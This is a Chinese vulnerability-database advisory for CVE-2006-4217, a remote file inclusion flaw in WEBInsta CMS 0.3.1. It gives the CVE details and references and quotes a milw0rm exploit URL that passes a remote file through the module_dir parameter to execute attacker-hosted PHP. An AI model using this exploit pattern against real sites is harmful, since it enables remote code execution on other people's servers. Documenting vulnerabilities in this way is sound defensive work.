WEBInsta CMS 'users.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110827 漏洞类型 未知
发布时间 2006-08-15 更新时间 2006-08-22
CVE编号 CVE-2006-4217 CNNVD-ID CNNVD-200608-285
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2189
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-285
|漏洞详情
WEBInstaCMS0.3.1的modules/usersonline/users.php脚本存在PHP远程文件包含漏洞,远程攻击者可以借助modules/usersonline/users参数内的URL执行任意PHP代码。
|漏洞EXP
/*
Vulnerable product : http://www.webinsta.com/download.html ( WEBInsta. CMS 0.3.1 )
Author : Yns - yns.zaxaz.com
*/

Exploit:
http://[HOST]/[PATH]/modules/usersonline/users.php?module_dir=[REMOTE_FILE]

# milw0rm.com [2006-08-15]
|参考资料

来源:SECUNIA
名称:21463
链接:http://secunia.com/advisories/21463
来源:XF
名称:webinsta-modules-file-include(28557)
链接:http://xforce.iss.net/xforce/xfdb/28557